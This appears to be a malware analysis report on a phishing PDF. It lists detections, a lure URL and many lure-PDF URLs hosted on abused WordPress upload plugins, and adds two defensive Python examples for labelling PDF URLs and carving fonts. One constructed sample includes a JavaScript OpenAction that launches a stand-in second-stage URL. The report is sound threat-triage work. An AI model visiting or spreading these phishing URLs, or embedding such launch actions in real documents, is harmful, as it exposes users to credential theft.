Verdict: MALICIOUS (risk score 94)
Malware Insights
MITRE ATT&CK
- T1566.001 Spearphishing Attachment
- T1059.007 JavaScript
Two independent engines flag the file: the Nyx classifier scores it 0.7952 and ClamAV matches it with a Pdf.Phishing.Trojan signature, which is consistent with a phishing lure rather than an exploit document. The URL reached through the PDF's external URI action, `https://laborke.ru/uplcv?utm_term=adara+wadan+new`, is the click-through the lure is built around and the most likely route to further content. No script was recovered from the file, so the T1059.007 (JavaScript) mapping is not backed by any extracted code; the verdict rests on the signature, the classifier score and the URI action. Most of the other extracted URLs point at .pdf files under form-upload plugin directories (formcraft/file-upload, super-forms/uploads) on unrelated sites, a pattern consistent with lure documents parked on abused WordPress upload endpoints. The remaining URLs (ascendercorp.com, scripts.sil.org/OFL, sinhala.sourceforge.net, gnu.org/licenses) are the kind of vendor and licence strings carried in font name tables, which matches the three embedded fonts carved below, and should not be treated as indicators.
Machine Learning
- Nyx PDF Classifier malicious score 0.7952
Heuristics 3
- ClamAV (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Pdf.Phishing.Trojan-d2528dad23a95d95-d2528dad23a95d95-10044376-0
- External URI (info, PDF_URI): PDF contains an external URL action
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
Extracted URLs:
- https://laborke.ru/uplcv?utm_term=adara+wadan+new
- http://alternativefitness.com.au/wp-content/plugins/formcraft/file-upload/server/content/files/16093a9b0723d8---lalomawof.pdf
- http://www.191seo.com/wp-content/plugins/formcraft/file-upload/server/content/files/1606d3d4270b8f---kixewulokakibodibi.pdf
- https://michaels-limo.com/wp-content/plugins/formcraft/file-upload/server/content/files/16080b11f56e97---19419349955.pdf
- http://bascobrunswick.com.au/wp-content/plugins/formcraft/file-upload/server/content/files/1607bbbe7bf21f---waborigiwiwusupeb.pdf
- https://kisikana.hr/userfiles/file/40375926739.pdf
- https://amkboiler.com/wp-content/plugins/super-forms/uploads/php/files/7rc1udq80444v9psefd02l80ta/kitorejajudixefa.pdf
- http://www.pirac.org/wp-content/plugins/super-forms/uploads/php/files/79749dc384598f777e9b19f6a8976590/wesifibif.pdf
- http://alhouti.com/userfiles/file/renomesirufovasizeferok.pdf
- https://www.arphplumbing.co.uk/wp-content/plugins/super-forms/uploads/php/files/brd2km3bcc9pcm94qj2paun4oc/46436412964.pdf
- https://lightupalife.org.uk/wp-content/plugins/formcraft/file-upload/server/content/files/1609654be305db---19586399491.pdf
- https://useoneconvo.com/wp-content/plugins/super-forms/uploads/php/files/471cf00eeaad943d85fa2c88ca2392e4/ramokomugako.pdf
- https://www.brunosistemi.com/wp-content/plugins/formcraft/file-upload/server/content/files/1609711a2caf16---22111550633.pdf
- http://asupuro.com/user_data/image//file/61105429404.pdf
- https://ontime-taxi.kg/wp-content/plugins/super-forms/uploads/php/files/90bbd1dee9c225c73a998e04603e5667/50737115916.pdf
- http://www.julitolaschools.com/wp-content/plugins/formcraft/file-upload/server/content/files/1607e9a073b3a0---basofeselaxuniruge.pdf
- http://www.orarestauratorisaf.it/wp-content/plugins/formcraft/file-upload/server/content/files/160970c4d158a4---tenozuvotifigemilel.pdf
- http://al-bandak.com/userfiles/file/davotupanelukedadiw.pdf
- http://www.ascendercorp.com/
- http://www.ascendercorp.com/typedesigners.html
- http://scripts.sil.org/OFL
- http://sinhala.sourceforge.net/
- http://sinhala.cvs.sourceforge.net/viewvc/*checkout*/sinhala/sinhala/fonts/CREDITS
- http://www.gnu.org/licenses/gpl-2.0.html
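The per-URL channel labelling that the EMBEDDED_URL heuristic refers to is what separates a URL the viewer can be made to open (a `/URI` action, a JavaScript action) from an inert string such as a font licence URL. The Python below is an added example, not the analyzer's own code: it walks a PDF's objects with stdlib-only parsing, inflates FlateDecode streams, and labels each URL by the object dictionary that carries it. The sample PDF is constructed inline; its JavaScript OpenAction and the `example.invalid` second-stage URL are assumptions (the report above recovered no script), and the parser handles only plain, unencrypted object syntax, not object streams.

```python
"""Label every URL in a PDF by the channel that carries it (added example).

Stdlib only: objects are located with regular expressions and FlateDecode
streams are inflated, which is enough for plain, unencrypted PDFs without
object streams. The sample document is constructed below.
"""
import re
import zlib

OBJ_RE = re.compile(rb"(\d+)\s+\d+\s+obj(.*?)endobj", re.S)
URL_RE = re.compile(rb"https?://[^\s<>()\[\]'\"]+")

# Channels a viewer can act on, as opposed to inert places a URL can sit.
ACTIONABLE = {"uri-action", "javascript"}


def _decode_stream(body):
    """Return the decoded stream bytes of one object body, or b'' if it has none."""
    m = re.search(rb"stream\r?\n", body)
    if not m:
        return b""
    data = body[m.end():]
    length = re.search(rb"/Length\s+(\d+)", body)  # /Length1 does not match this
    data = data[:int(length.group(1))] if length else data.split(b"endstream", 1)[0]
    if b"/FlateDecode" in body:
        try:
            return zlib.decompress(data)
        except zlib.error:
            return data  # corrupt stream: scan the raw bytes rather than drop them
    return data


def _channel(dictionary, in_stream):
    """Classify a URL by the dictionary of the object it was found in."""
    if re.search(rb"/S\s*/URI\b", dictionary):
        return "uri-action"      # link annotation or OpenAction carrying a URI action
    if re.search(rb"/S\s*/JavaScript\b|/JS\b", dictionary):
        return "javascript"
    if in_stream and re.search(rb"/Length1\b|/FontFile|/Type1C", dictionary):
        return "font-metadata"   # name/licence strings inside an embedded font program
    return "stream-body" if in_stream else "object-body"


def label_urls(pdf_bytes):
    """Return sorted (url, channel, object_number) for every URL in the PDF."""
    found = set()
    for m in OBJ_RE.finditer(pdf_bytes):
        num, body = int(m.group(1)), m.group(2)
        dictionary = body.split(b"stream", 1)[0]
        for url in URL_RE.findall(dictionary):
            found.add((url.decode("latin-1"), _channel(dictionary, False), num))
        for url in URL_RE.findall(_decode_stream(body)):
            found.add((url.decode("latin-1"), _channel(dictionary, True), num))
    return sorted(found)


def actionable_urls(pdf_bytes):
    """Only the URLs the viewer can be made to open; licence strings drop out."""
    return sorted({u for u, ch, _ in label_urls(pdf_bytes) if ch in ACTIONABLE})


def build_sample_pdf():
    """Constructed sample: a link annotation pointing at the URL from the report,
    a JavaScript OpenAction (assumption; the report extracted no script) and an
    embedded font stream whose name table carries a licence URL."""
    font = zlib.compress(b"\x00\x01\x00\x00 name table: Copyright, http://scripts.sil.org/OFL")
    objs = [
        b"1 0 obj\n<< /Type /Catalog /Pages 2 0 R /OpenAction 5 0 R >>\nendobj\n",
        b"2 0 obj\n<< /Type /Pages /Kids [3 0 R] /Count 1 >>\nendobj\n",
        b"3 0 obj\n<< /Type /Page /Parent 2 0 R /Annots [4 0 R] >>\nendobj\n",
        b"4 0 obj\n<< /Type /Annot /Subtype /Link /Rect [0 0 100 20] "
        b"/A << /S /URI /URI (https://laborke.ru/uplcv?utm_term=adara+wadan+new) >> >>\nendobj\n",
        b"5 0 obj\n<< /S /JavaScript "
        b"/JS (app.launchURL\\(\"https://example.invalid/second-stage\", true\\)) >>\nendobj\n",
        b"6 0 obj\n<< /Length %d /Length1 64 /Filter /FlateDecode >>\nstream\n" % len(font)
        + font + b"\nendstream\nendobj\n",
    ]
    return b"%PDF-1.7\n" + b"".join(objs) + b"%%EOF\n"


if __name__ == "__main__":
    for url, channel, num in label_urls(build_sample_pdf()):
        print(f"obj {num:>3}  {channel:<14} {url}")
```

Run stand-alone it prints one line per URL with its channel; in triage, `actionable_urls` is the list worth detonating or blocking, while the font-metadata hit is the same class of string as the ascendercorp.com and SIL OFL URLs above.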
Extracted artifacts 3
Files carved from inside the sample during analysis.
| Filename | SHA-256 | Kind | Source | Size |
|---|---|---|---|---|
| font_00_sfnt_off0000e88b.bin | 5ca33dd31e038f59ac51d9c08d2140b954e065334bf6163d4a05f4dce8d24a07 | pdf-font-stream | PDF embedded font (sfnt) at offset 0xE88B | 4692 bytes |
| font_01_sfnt_off0000f85c.bin | 06a5efd455577dae79b4db55d08f1775f3b17d532d664c568ba526b62481ee3a | pdf-font-stream | PDF embedded font (sfnt) at offset 0xF85C | 32188 bytes |
| font_02_sfnt_off0001413a.bin | cacc549065462a03977c77918f62574e80a7863a399e2b2e2598abdfbf61a8f4 | pdf-font-stream | PDF embedded font (sfnt) at offset 0x1413A | 11636 bytes |
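The three artifacts above were carved from the PDF by offset and sized from the font itself. The Python below is an added example, not the analyzer's carver: it finds sfnt signatures in a buffer, validates the table directory, and derives the carve length from the furthest table end, so the result does not depend on the PDF's own `/Length1`, which a malformed document can misstate. The font and its PDF-like container are constructed inline; the container deliberately includes the token `true` from a PDF dictionary to show why the directory check matters.

```python
"""Carve embedded sfnt fonts (TrueType/OpenType) out of a byte buffer (added example).

An sfnt begins with a 4-byte version tag, a uint16 table count and a directory
of 16-byte table records; the font ends where its furthest table ends, so the
carve length comes from the directory rather than from the PDF's /Length1.
"""
import hashlib
import struct

SFNT_TAGS = (b"\x00\x01\x00\x00", b"OTTO", b"true")
MAX_TABLES = 64  # real fonts have far fewer; larger counts are noise, not fonts


def sfnt_length(buf, off):
    """Length of the sfnt starting at buf[off], or 0 if no valid directory is there."""
    if off + 12 > len(buf) or buf[off:off + 4] not in SFNT_TAGS:
        return 0
    num_tables = struct.unpack_from(">H", buf, off + 4)[0]
    if not 1 <= num_tables <= MAX_TABLES:
        return 0
    dir_end = 12 + 16 * num_tables
    end = dir_end
    for i in range(num_tables):
        rec = off + 12 + 16 * i
        if rec + 16 > len(buf):
            return 0
        tag, _checksum, toff, tlen = struct.unpack_from(">4sIII", buf, rec)
        if any(b < 0x20 or b > 0x7E for b in tag):  # tags are printable ASCII ("cvt ", "OS/2")
            return 0
        if toff < dir_end or toff + tlen > len(buf) - off:
            return 0
        end = max(end, toff + tlen)
    return end


def carve_sfnt(buf):
    """Return (offset, length, sha256 hex) for every sfnt whose directory validates."""
    found, off = [], 0
    while off < len(buf):
        hits = [h for h in (buf.find(tag, off) for tag in SFNT_TAGS) if h != -1]
        if not hits:
            break
        off = min(hits)
        length = sfnt_length(buf, off)
        if length:
            found.append((off, length, hashlib.sha256(buf[off:off + length]).hexdigest()))
            off += length  # do not rescan inside a carved font
        else:
            off += 1       # e.g. the word "true" in a PDF dictionary
    return found


def build_sample_font():
    """Constructed two-table sfnt (not a renderable font)."""
    tables = [
        (b"head", b"\x00" * 54),
        (b"name", b"Constructed name table; licence http://scripts.sil.org/OFL"),
    ]
    n = len(tables)
    # searchRange/entrySelector/rangeShift for two tables: 32, 1, 0
    header = struct.pack(">4sHHHH", b"\x00\x01\x00\x00", n, 32, 1, 0)
    directory, body = b"", b""
    for tag, data in tables:
        body += b"\x00" * (-len(body) % 4)  # each table starts 4-byte aligned
        directory += struct.pack(">4sIII", tag, 0, 12 + 16 * n + len(body), len(data))
        body += data
    return header + directory + body


def build_sample_container():
    """Constructed PDF-like wrapper around the font, with a decoy 'true' token."""
    return (b"%PDF-1.7\n<< /Marked true >>\nstream\n"
            + build_sample_font() + b"\nendstream\n")


if __name__ == "__main__":
    for off, length, digest in carve_sfnt(build_sample_container()):
        print(f"font at offset 0x{off:X}, {length} bytes, sha256 {digest}")
```

The `true` decoy is rejected because the bytes that follow it decode to an implausible table count; on a real PDF the same check discards every `/Marked true`, `/Hidden true` and similar token, leaving only FontFile2/OpenType streams to be hashed and compared against the SHA-256 values in the table above.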